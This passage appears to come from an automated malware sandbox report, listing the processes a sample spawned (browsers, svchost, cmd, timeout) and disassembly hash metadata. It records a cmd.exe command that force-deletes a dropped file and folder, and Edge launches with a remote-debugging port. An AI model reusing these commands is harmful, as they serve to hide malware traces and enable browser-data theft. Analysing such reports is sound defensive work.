                                                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                                                                            Start time:10:58:52
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                                                                            Start time:10:58:52
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2712 --field-trial-handle=2316,i,2421533482498937402,17485656150599773384,262144 /prefetch:8
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                                                                            Start time:10:59:05
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                                                                            Start time:10:59:05
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                                                                            Start time:10:59:05
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2716 --field-trial-handle=2612,i,12049331983733306251,11913654916641555052,262144 /prefetch:3
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                                                                            Start time:10:59:06
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2100 --field-trial-handle=2016,i,7658775566138034046,42518589343975993,262144 /prefetch:3
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                                                                            Start time:10:59:16
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                                                                            Start time:10:59:16
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2644 --field-trial-handle=2524,i,1638855310437427533,11522752701638102957,262144 /prefetch:3
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                                                                            Start time:10:59:16
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                                                                            Start time:10:59:17
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=2024,i,13925894033396477380,4359121929827031238,262144 /prefetch:3
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                                                                                            Start time:10:59:21
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6928 --field-trial-handle=2024,i,13925894033396477380,4359121929827031238,262144 /prefetch:8
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                                                                                                            Start time:10:59:21
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2024,i,13925894033396477380,4359121929827031238,262144 /prefetch:8
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                            File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                                                                                                            Start time:10:59:42
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com" & rd /s /q "C:\ProgramData\dj5xt" & exit
                                                                                                                                                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                                                                                                            Start time:10:59:42
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                                                                                            Start time:10:59:42
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                            Imagebase:0x30000
                                                                                                                                                                                                                                                                                            File size:25'088 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                                                              Function 00007FF848E96938 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2203708287.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID: XbH
                                                                                                                                                                                                                                                                                              • API String ID: 0-3684695552
                                                                                                                                                                                                                                                                                              • Opcode ID: f0a59170bcad56c161f632dd5c3b9ac721953be583e1a7df69a4c0a1f2bece6d
                                                                                                                                                                                                                                                                                              • Instruction ID: 01a4977ff54f4e624283de1d10a2cd7bbe2f889301f4630a097328e7a9b06bc7
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0a59170bcad56c161f632dd5c3b9ac721953be583e1a7df69a4c0a1f2bece6d
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AE02B12D1D9D78FE358B36C44612A46BA0FB4A640F1440FFC049CB1F7D99C1C088351
                                                                                                                                                                                                                                                                                              Function 00007FF848E96310 Relevance: .8, Instructions: 768COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2203708287.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: b51eaf3ad46352867dd3600a10f86abe1914c493b3d48ecbff101d67f7129b3a
                                                                                                                                                                                                                                                                                              • Instruction ID: 9fa8aeabfe7e66ab999ebcfdd8f1a11742feb1f1479ab1989ff658e431d4a576
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b51eaf3ad46352867dd3600a10f86abe1914c493b3d48ecbff101d67f7129b3a
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28711721A0DA895FE74AF76C94655F87BE0FF46394F0801FBC04DCB1A3DE2868468795
                                                                                                                                                                                                                                                                                              Function 00007FF848E96468 Relevance: .6, Instructions: 577COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2203708287.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: 08f8f3a6581c7e99192198e3c0c76a4cf62714ac4ec6be95bcbef05a60e874ae
                                                                                                                                                                                                                                                                                              • Instruction ID: ba420f371781b088d99e846572c82bcb1ea2b846e9457d9a94b8583b453d289b
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08f8f3a6581c7e99192198e3c0c76a4cf62714ac4ec6be95bcbef05a60e874ae
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8421AC21A1DC8A9EE789B37C10262F966D1EF886C4F4900FAD00DCB2A7EE6C58464385
                                                                                                                                                                                                                                                                                              Function 00007FF848E96470 Relevance: .6, Instructions: 571COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2203708287.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: ecf842c33f2608b4015991c43ff736ebedf43b48ed8841d83e7e13ab318bb067
                                                                                                                                                                                                                                                                                              • Instruction ID: 09b331feff56ebcb3b6104a84dfa3479a7040b4ffeaf84396b33feaedc8769fe
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecf842c33f2608b4015991c43ff736ebedf43b48ed8841d83e7e13ab318bb067
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB216D11B1DD8A9EE799B37C40262FD56D2EF886C4F4944FAD00DC72E7EE6C68064385
                                                                                                                                                                                                                                                                                              Function 00007FF848E9834C Relevance: .5, Instructions: 513COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2203708287.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: d4cd7306793bedd6194dfda16061f9dfec555ac46cf783c940468fdc549d2b3c
                                                                                                                                                                                                                                                                                              • Instruction ID: 19dde2df29075e680914275ec6b8c5ec9d6aa7e7c74ada1fd5bcdf95ef2b9ee1
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4cd7306793bedd6194dfda16061f9dfec555ac46cf783c940468fdc549d2b3c
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58F16420A0D6965FF358B66884552B977C1FF85398F1840BDD88EC72E3DF6CA8438746
                                                                                                                                                                                                                                                                                              Function 00007FF848F6109E Relevance: .5, Instructions: 481COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2204838430.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848f60000_powershell.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: 03f194f1ef2232e28c1451068245d776399d80aaa8fd72368efd76650db5eeb6
                                                                                                                                                                                                                                                                                              • Instruction ID: 2a0b1c7fb5ffddc34b8045de0a33fb455ef5edcacad75b81ffb51f07e2f880fb
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03f194f1ef2232e28c1451068245d776399d80aaa8fd72368efd76650db5eeb6
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBD13531E0EACA4FE7A9AB2C18656757BE1EF56290F0802FED04DD71D3EE089C468355
                                                                                                                                                                                                                                                                                              Function 00007FF848E978E8 Relevance: .3, Instructions: 282COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2203708287.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: 85e8ac52c86231e70e877cded214f75a8f1d2b22ea6e37fd2baebb3a0efadd57
                                                                                                                                                                                                                                                                                              • Instruction ID: b415a9300aed6806a845dc3922ae9312d75be68059375c9789c12fde6e73fc91
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85e8ac52c86231e70e877cded214f75a8f1d2b22ea6e37fd2baebb3a0efadd57
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08914730A1C7968FE354EB68844167A77E0FF86388F0405BEE489C72A3DF7DA8468705
                                                                                                                                                                                                                                                                                              Function 00007FF848F610EA Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2204838430.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848f60000_powershell.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: fa92c43662a862e0451a13e860dbb7fa13ba2fdd1b986b9c7f81e7e75c3de218
                                                                                                                                                                                                                                                                                              • Instruction ID: a9baeaabb935eddbcd906f9aebddf54c1c6c7f3e7eef4f8c70c3fb913eecd3c8
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa92c43662a862e0451a13e860dbb7fa13ba2fdd1b986b9c7f81e7e75c3de218
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58312531E1EE8A4FF7A9FB2C146567866D1EF05390F0802BAD40DE71D3EE08AC854359
                                                                                                                                                                                                                                                                                              Function 00007FF848EA0C1A Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2203708287.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: 76d1f51a9fee9d0bcf11d877fda84bfb294cc5db31ff76d686c3e0fbd6d1cc51
                                                                                                                                                                                                                                                                                              • Instruction ID: 6c302e06bb9c53de40121599e98c21d30e8c8ee4b729073f7fb0b83706db1afa
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76d1f51a9fee9d0bcf11d877fda84bfb294cc5db31ff76d686c3e0fbd6d1cc51
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6121CF7190CA0C9FDB18DF58D44ABF9BBE0FB59321F00422ED04AD3611DB71A456CB91
                                                                                                                                                                                                                                                                                              Function 00007FF848E9C13D Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2203708287.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff848e90000_powershell.jbxd
                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                              • Opcode ID: d29a409f8f0238efb449784dd17ecb367542da6c3e8b29b3a099ad6f5711cc54
                                                                                                                                                                                                                                                                                              • Instruction ID: 85a76f32c57121a58c5e14e17a0f037984717549302cd0cebf4d1ecc091792a7
                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d29a409f8f0238efb449784dd17ecb367542da6c3e8b29b3a099ad6f5711cc54
                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F11269484E2C55EE34377792C604B27FF4DE93169B0806EBE0C8C9093EA48088AC35B
